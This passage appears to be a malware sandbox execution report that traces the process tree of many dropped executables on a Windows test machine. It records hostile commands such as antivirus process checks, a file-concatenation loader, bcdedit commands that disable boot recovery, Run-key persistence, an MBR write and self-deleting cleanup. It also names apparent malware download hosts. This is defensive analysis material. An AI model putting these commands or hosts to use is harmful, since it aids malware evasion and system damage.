    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:3512
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa.exe opssvc.exe"
        5⤵
        
        PID:3928
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:6124
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
        5⤵
        
        PID:4624
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 778819
        5⤵
        
        PID:5812
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "MaterialThermalCaymanOpens" Array
        5⤵
        
        PID:5852
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b Frost + Correlation + Periodic + Landing + Roller 778819\i
        5⤵
        
        PID:3476
    - - C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\778819\Child.pif
        
        778819\Child.pif 778819\i
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5876
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 5 127.0.0.1
        5⤵
        Runs ping.exe
        
        PID:2276
- - C:\Users\Admin\AppData\Local\Temp\http198.23.227.21320040igcc.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http198.23.227.21320040igcc.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5276
  - - C:\Users\Admin\AppData\Local\Temp\http198.23.227.21320040igcc.exe.exe
      "C:\Users\Admin\AppData\Local\Temp\http198.23.227.21320040igcc.exe.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:5660
- - C:\Users\Admin\AppData\Local\Temp\httpscecil.com.egtemplegendainstalls.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpscecil.com.egtemplegendainstalls.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5296
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
      4⤵
      PID:5588
- - C:\Users\Admin\AppData\Local\Temp\http107.173.143.2820055igcc.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http107.173.143.2820055igcc.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    PID:5568
  - - C:\Users\Admin\AppData\Local\Temp\http107.173.143.2820055igcc.exe.exe
      "C:\Users\Admin\AppData\Local\Temp\http107.173.143.2820055igcc.exe.exe"
      4⤵
      Executes dropped EXE
      PID:5040
  - - C:\Users\Admin\AppData\Local\Temp\http107.173.143.2820055igcc.exe.exe
      "C:\Users\Admin\AppData\Local\Temp\http107.173.143.2820055igcc.exe.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      PID:5536
- - C:\Users\Admin\AppData\Local\Temp\http5.42.65.116lumma2705.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http5.42.65.116lumma2705.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5636
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4172
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 272
      4⤵
      Program crash
      PID:3052
- - C:\Users\Admin\AppData\Local\Temp\http204.137.14.1350603.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http204.137.14.1350603.exe.exe"
    3⤵
    - Executes dropped EXE
    PID:5240
- - C:\Users\Admin\AppData\Local\Temp\httpswondershare-filmora.topfwefwe324234234rgeffwehtrwyrhtrhtqwfqwd31443wefefwwfer3232fewwefwefwefqgrqwtherergqefwefqweqfwqf32fefwsdauploadsamm.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpswondershare-filmora.topfwefwe324234234rgeffwehtrwyrhtrhtqwfqwd31443wefefwwfer3232fewwefwefwefqgrqwtherergqefwefqweqfwqf32fefwsdauploadsamm.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:2696
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4960
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:476
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Checks processor information in registry
      PID:684
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 1372
        5⤵
        Program crash
        
        PID:1320
- - C:\Users\Admin\AppData\Local\Temp\http147.45.47.14954674radekano.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http147.45.47.14954674radekano.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetWindowsHookEx
    PID:6092
- - C:\Users\Admin\AppData\Local\Temp\http147.45.47.121Chrome.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http147.45.47.121Chrome.exe.exe"
    3⤵
    - Executes dropped EXE
    PID:2992
- - C:\Users\Admin\AppData\Local\Temp\http192.3.83.115AAQ.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http192.3.83.115AAQ.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:4760
- - C:\Users\Admin\AppData\Local\Temp\http49.13.194.118ADServices.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http49.13.194.118ADServices.exe.exe"
    3⤵
    - Executes dropped EXE
    PID:3972
  - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      PID:2172
- - C:\Users\Admin\AppData\Local\Temp\httpsraw.githubusercontent.comJonasBWFreakyJolly.commasterDemoZinker.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpsraw.githubusercontent.comJonasBWFreakyJolly.commasterDemoZinker.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:2820
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:1088
- - C:\Users\Admin\AppData\Local\Temp\httpsfree.360totalsecurity.comtotalsecurity360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpsfree.360totalsecurity.comtotalsecurity360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe.exe"
    3⤵
    - Executes dropped EXE
    - Writes to the Master Boot Record (MBR)
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2376
  - - C:\Users\Admin\AppData\Local\Temp\360TS_Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\360TS_Setup.exe" /c:WW.Peter.CPI202405 /pmode:2 /promo:eyJib290dGltZSI6IjMiLCJtZWRhbCI6IjMiLCJuZXdzIjoiMCIsIm9wZXJhIjoiMyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjMiLCJyZW1pbmRlciI6IjMiLCJ1cGdyYWRlX25vdyI6IjAifQo=
      4⤵
      PID:8532
    - - C:\Program Files (x86)\1717590411_0\360TS_Setup.exe
        
        "C:\Program Files (x86)\1717590411_0\360TS_Setup.exe" /c:WW.Peter.CPI202405 /pmode:2 /promo:eyJib290dGltZSI6IjMiLCJtZWRhbCI6IjMiLCJuZXdzIjoiMCIsIm9wZXJhIjoiMyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjMiLCJyZW1pbmRlciI6IjMiLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall
        5⤵
        
        PID:7296
- - C:\Users\Admin\AppData\Local\Temp\httpssoftcatalog.rudownload404a6ca328-7888-3279-b672-d1d9d0a46ee2GTA_V.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpssoftcatalog.rudownload404a6ca328-7888-3279-b672-d1d9d0a46ee2GTA_V.exe.exe"
    3⤵
    - Executes dropped EXE
    PID:4016
  - - C:\Users\Admin\AppData\Local\Temp\is-A9PTK.tmp\httpssoftcatalog.rudownload404a6ca328-7888-3279-b672-d1d9d0a46ee2GTA_V.exe.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-A9PTK.tmp\httpssoftcatalog.rudownload404a6ca328-7888-3279-b672-d1d9d0a46ee2GTA_V.exe.tmp" /SL5="$70236,18245672,1148416,C:\Users\Admin\AppData\Local\Temp\httpssoftcatalog.rudownload404a6ca328-7888-3279-b672-d1d9d0a46ee2GTA_V.exe.exe"
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      PID:1916
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c nslookup myip.opendns.com. resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\is-GVG99.tmp\ip.txt
        5⤵
        
        PID:5320
      - C:\Windows\SysWOW64\nslookup.exe
        
        nslookup myip.opendns.com. resolver1.opendns.com
        6⤵
        
        PID:456
    - - C:\Users\Admin\AppData\Local\Temp\is-GVG99.tmp\7z.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-GVG99.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-GVG99.tmp\libs.7z -y -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-GVG99.tmp
        5⤵
        Executes dropped EXE
        
        PID:5024
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4460
    - - C:\Users\Admin\AppData\Local\Temp\is-GVG99.tmp\7z.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-GVG99.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-GVG99.tmp\5WRX13R1F.7z -y -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-GVG99.tmp\4A6CA328-7888-3279-B672-D1D9D0A46EE2
        5⤵
        Executes dropped EXE
        
        PID:6540
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:6580
- - C:\Users\Admin\AppData\Local\Temp\http185.73.125.6applicationld.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http185.73.125.6applicationld.exe.exe"
    3⤵
    - Executes dropped EXE
    - Enumerates connected drives
    - Drops file in Program Files directory
    - System policy modification
    PID:4884
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
      4⤵
      PID:1584
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5940
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {current} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:6032
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
      4⤵
      PID:2220
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1044
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {current} recoveryenabled no
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1548
- - C:\Users\Admin\AppData\Local\Temp\http185.73.125.6MSiedge.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http185.73.125.6MSiedge.exe.exe"
    3⤵
    - Executes dropped EXE
    PID:4484
- - C:\Users\Admin\AppData\Local\Temp\httpsraw.githubusercontent.comsheksweetsheksweet1mainRambledMime.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpsraw.githubusercontent.comsheksweetsheksweet1mainRambledMime.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:4856
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Suspicious use of SetThreadContext
      PID:1004
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        5⤵
        
        PID:3600
- - C:\Users\Admin\AppData\Local\Temp\http77.91.77.33current.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http77.91.77.33current.exe.exe"
    3⤵
    - Executes dropped EXE
    PID:6104
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6104 -s 1132
      4⤵
      Program crash
      PID:7136
- - C:\Users\Admin\AppData\Local\Temp\httpdoggie-services.comooriggmixinte.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpdoggie-services.comooriggmixinte.exe.exe"
    3⤵
    - Executes dropped EXE
    PID:7688
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "httpdoggie-services.comooriggmixinte.exe.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\httpdoggie-services.comooriggmixinte.exe.exe" & exit
      4⤵
      PID:9076
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:7796
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "httpdoggie-services.comooriggmixinte.exe.exe" /f
        5⤵
        Kills process with taskkill
        
        PID:6960
- - C:\Users\Admin\AppData\Local\Temp\httpjobs-servers.comooriggmixinte.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpjobs-servers.comooriggmixinte.exe.exe"
    3⤵
    - Executes dropped EXE
    PID:2296
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "httpjobs-servers.comooriggmixinte.exe.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\httpjobs-servers.comooriggmixinte.exe.exe" & exit
      4⤵
      PID:8684
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "httpjobs-servers.comooriggmixinte.exe.exe" /f
        5⤵
        Kills process with taskkill
        
        PID:8368
- - C:\Users\Admin\AppData\Local\Temp\httpmiles-and-more-kreditkartes.comooriggmixinte.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpmiles-and-more-kreditkartes.comooriggmixinte.exe.exe"
    3⤵
    - Executes dropped EXE
    PID:7780
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "httpmiles-and-more-kreditkartes.comooriggmixinte.exe.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\httpmiles-and-more-kreditkartes.comooriggmixinte.exe.exe" & exit
      4⤵
      PID:8324
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "httpmiles-and-more-kreditkartes.comooriggmixinte.exe.exe" /f
        5⤵
        Kills process with taskkill
        
        PID:8552
- - C:\Users\Admin\AppData\Local\Temp\httpjobs-servers.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
    "C:\Users\Admin\AppData\Local\Temp\httpjobs-servers.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe"
    3⤵
    PID:7636
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7636 -s 480
      4⤵
      Program crash
      PID:6336
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7636 -s 812
      4⤵
      Program crash
      PID:2956
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7636 -s 848
      4⤵
      Program crash
      PID:4916
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7636 -s 1104
      4⤵
      Program crash
      PID:6960
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7636 -s 1392
      4⤵
      Program crash
      PID:744
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7636 -s 1720
      4⤵
      Program crash
      PID:11040
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "httpjobs-servers.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\httpjobs-servers.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" & exit
      4⤵
      PID:10680
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "httpjobs-servers.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" /f
        5⤵
        Kills process with taskkill
        
        PID:10824
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7636 -s 1764
      4⤵
      Program crash
      PID:11152
- - C:\Users\Admin\AppData\Local\Temp\httpdoggie-services.comoorigginte.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpdoggie-services.comoorigginte.exe.exe"
    3⤵
    PID:6616
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "httpdoggie-services.comoorigginte.exe.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\httpdoggie-services.comoorigginte.exe.exe" & exit
      4⤵
      PID:8332
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1548
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "httpdoggie-services.comoorigginte.exe.exe" /f
        5⤵
        Kills process with taskkill
        
        PID:9236
- - C:\Users\Admin\AppData\Local\Temp\httpdoggie-services.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
    "C:\Users\Admin\AppData\Local\Temp\httpdoggie-services.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe"
    3⤵
    PID:4908
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 480
      4⤵
      Program crash
      PID:4940
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 800
      4⤵
      Program crash
      PID:7592
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1124
      4⤵
      Program crash
      PID:7532
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1156
      4⤵
      Program crash
      PID:6380
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1732
      4⤵
      Program crash
      PID:10760
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "httpdoggie-services.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\httpdoggie-services.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" & exit
      4⤵
      PID:5944
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "httpdoggie-services.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" /f
        5⤵
        Kills process with taskkill
        
        PID:11036
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1764
      4⤵
      Program crash
      PID:10544
- - C:\Users\Admin\AppData\Local\Temp\httpjobs-servers.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
    "C:\Users\Admin\AppData\Local\Temp\httpjobs-servers.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe"
    3⤵
    PID:6724
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6724 -s 480
      4⤵
      Program crash
      PID:5364
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6724 -s 1724
      4⤵
      Program crash
      PID:9392
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "httpjobs-servers.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\httpjobs-servers.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" & exit
      4⤵
      PID:9844
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "httpjobs-servers.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" /f
        5⤵
        Kills process with taskkill
        
        PID:10148
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6724 -s 1800
      4⤵
      Program crash
      PID:5516
- - C:\Users\Admin\AppData\Local\Temp\httpdoggie-services.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
    "C:\Users\Admin\AppData\Local\Temp\httpdoggie-services.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe"
    3⤵
    PID:7848
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7848 -s 480
      4⤵
      Program crash
      PID:8064
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7848 -s 892
      4⤵
      Program crash
      PID:7152
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7848 -s 1760
      4⤵
      Program crash
      PID:9816
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "httpdoggie-services.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\httpdoggie-services.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" & exit
      4⤵
      PID:10716
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "httpdoggie-services.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" /f
        5⤵
        Kills process with taskkill
        
        PID:10464
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7848 -s 656
      4⤵
      Program crash
      PID:10876
- - C:\Users\Admin\AppData\Local\Temp\httpmiles-and-more-kreditkartes.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
    "C:\Users\Admin\AppData\Local\Temp\httpmiles-and-more-kreditkartes.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe"
    3⤵
    PID:7060
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7060 -s 828
      4⤵
      Program crash
      PID:7868
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7060 -s 892
      4⤵
      Program crash
      PID:7440
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7060 -s 1124
      4⤵
      Program crash
      PID:7692
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7060 -s 1136
      4⤵
      Program crash
      PID:7108
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7060 -s 1352
      4⤵
      Program crash
      PID:8960
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7060 -s 1732
      4⤵
      Program crash
      PID:10276
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "httpmiles-and-more-kreditkartes.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\httpmiles-and-more-kreditkartes.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" & exit
      4⤵
      PID:10468
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "httpmiles-and-more-kreditkartes.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" /f
        5⤵
        Kills process with taskkill
        
        PID:10304
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7060 -s 536
      4⤵
      Program crash
      PID:10368
- - C:\Users\Admin\AppData\Local\Temp\httpmiles-and-more-kreditkartes.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
    "C:\Users\Admin\AppData\Local\Temp\httpmiles-and-more-kreditkartes.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe"
    3⤵
    PID:8048
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8048 -s 480
      4⤵
      Program crash
      PID:7092
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8048 -s 812
      4⤵
      Program crash
      PID:1432
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8048 -s 1528
      4⤵
      Program crash
      PID:10016
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8048 -s 1772
      4⤵
      Program crash
      PID:5644
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "httpmiles-and-more-kreditkartes.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\httpmiles-and-more-kreditkartes.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" & exit
      4⤵
      PID:2648
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "httpmiles-and-more-kreditkartes.comdl.phppub=mixfiveid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" /f
        5⤵
        Kills process with taskkill
        
        PID:10684
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8048 -s 560
      4⤵
      Program crash
      PID:10264
- - C:\Users\Admin\AppData\Local\Temp\httpjobs-servers.comoorigginte.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpjobs-servers.comoorigginte.exe.exe"
    3⤵
    PID:988
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "httpjobs-servers.comoorigginte.exe.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\httpjobs-servers.comoorigginte.exe.exe" & exit
      4⤵
      PID:10204
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "httpjobs-servers.comoorigginte.exe.exe" /f
        5⤵
        Kills process with taskkill
        
        PID:9848
- - C:\Users\Admin\AppData\Local\Temp\httpdoggie-services.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
    "C:\Users\Admin\AppData\Local\Temp\httpdoggie-services.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe"
    3⤵
    PID:5556
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5556 -s 480
      4⤵
      Program crash
      PID:1232
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5556 -s 1212
      4⤵
      Program crash
      PID:6452
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5556 -s 1504
      4⤵
      Program crash
      PID:4444
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5556 -s 1496
      4⤵
      Program crash
      PID:10628
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "httpdoggie-services.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\httpdoggie-services.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" & exit
      4⤵
